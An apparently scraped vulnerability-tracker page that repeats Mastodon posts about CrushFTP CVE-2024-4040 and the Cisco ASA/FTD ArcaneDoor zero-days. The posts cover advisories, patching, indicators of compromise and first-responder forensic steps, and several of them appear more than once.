> A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.

##

catc0n@infosec.exchange at 2024-04-23T15:43:34.000Z ##

Rapid7 researcher @fuzz analyzed #CrushFTP CVE-2024-4040 and found that it's not only exploitable for arbitrary file read as root, but also authentication bypass for admin access and full RCE. Patch immediately. rapid7.com/blog/post/2024/04/2

##

h4sh@infosec.exchange at 2024-04-23T12:56:51.000Z ##

Exploit from airbus-cert is out for #crushFTP CVE-2024-4040

Expect more in the wild exploitation in the coming days.. infosec.exchange/@wvu/11232021

##

wvu@infosec.exchange at 2024-04-23T11:06:48.000Z ##

h/t @JohnHammond github.com/airbus-cert/CVE-202

##

campuscodi@mastodon.social at 2024-04-22T23:14:42.000Z ##

The CrushFTP zero-day is now CVE-2024-4040

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-20359
(6.0 MEDIUM)

EPSS: 0.13%

updated 2024-04-26T15:25:02.773000

52 posts

A vulnerability in a legacy capability that allowed for the preloading of VPN clients and plug-ins and that has been available in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary code with root-level privileges. Administrator-level privileges are required to exploit this vulnerabilit

1 repos

https://github.com/west-wind/Threat-Hunting-With-Splunk

screaminggoat at 2024-04-26T20:16:17.085Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat at 2024-04-25T02:52:31.608Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

##

avuko at 2024-04-24T20:59:17.602Z ##

So, if you think you've maybe got / issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE () in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat at 2024-04-24T19:27:17.460Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

##

screaminggoat at 2024-04-24T19:16:42.383Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat at 2024-04-24T16:53:30.823Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

##

screaminggoat at 2024-04-24T16:11:54.051Z ##

Wake up babe, new Cisco actively exploited zero days just dropped:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! cisa.gov/news-events/alerts/20

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: cyber.gc.ca/en/news-events/cyb

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

##

screaminggoat@infosec.exchange at 2024-04-26T20:16:17.000Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-25T02:52:31.000Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

##

avuko@infosec.exchange at 2024-04-24T20:59:17.000Z ##

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat@infosec.exchange at 2024-04-24T19:27:17.000Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

screaminggoat@infosec.exchange at 2024-04-24T19:16:42.000Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-24T16:53:30.000Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

##

screaminggoat@infosec.exchange at 2024-04-24T16:11:54.000Z ##

Wake up babe, new Cisco actively exploited zero days just dropped:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! cisa.gov/news-events/alerts/20

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: cyber.gc.ca/en/news-events/cyb

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC

##

H3liumb0y at 2024-04-25T07:25:30.414Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

##

H3liumb0y@infosec.exchange at 2024-04-25T07:25:30.000Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

##

screaminggoat at 2024-04-26T20:16:17.085Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat at 2024-04-25T02:52:31.608Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

##

avuko at 2024-04-24T20:59:17.602Z ##

So, if you think you've maybe got / issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE () in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat at 2024-04-24T19:27:17.460Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

##

screaminggoat at 2024-04-24T19:16:42.383Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat at 2024-04-24T16:53:30.823Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

##

screaminggoat at 2024-04-24T16:11:54.051Z ##

Wake up babe, new Cisco actively exploited zero days just dropped:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! cisa.gov/news-events/alerts/20

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: cyber.gc.ca/en/news-events/cyb

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

##

screaminggoat@infosec.exchange at 2024-04-26T20:16:17.000Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-25T02:52:31.000Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

##

avuko@infosec.exchange at 2024-04-24T20:59:17.000Z ##

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat@infosec.exchange at 2024-04-24T19:27:17.000Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

screaminggoat@infosec.exchange at 2024-04-24T19:16:42.000Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-24T16:53:30.000Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

##

screaminggoat@infosec.exchange at 2024-04-24T16:11:54.000Z ##

Wake up babe, new Cisco actively exploited zero days just dropped:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! cisa.gov/news-events/alerts/20

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: cyber.gc.ca/en/news-events/cyb

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC

##

H3liumb0y at 2024-04-25T07:25:30.414Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
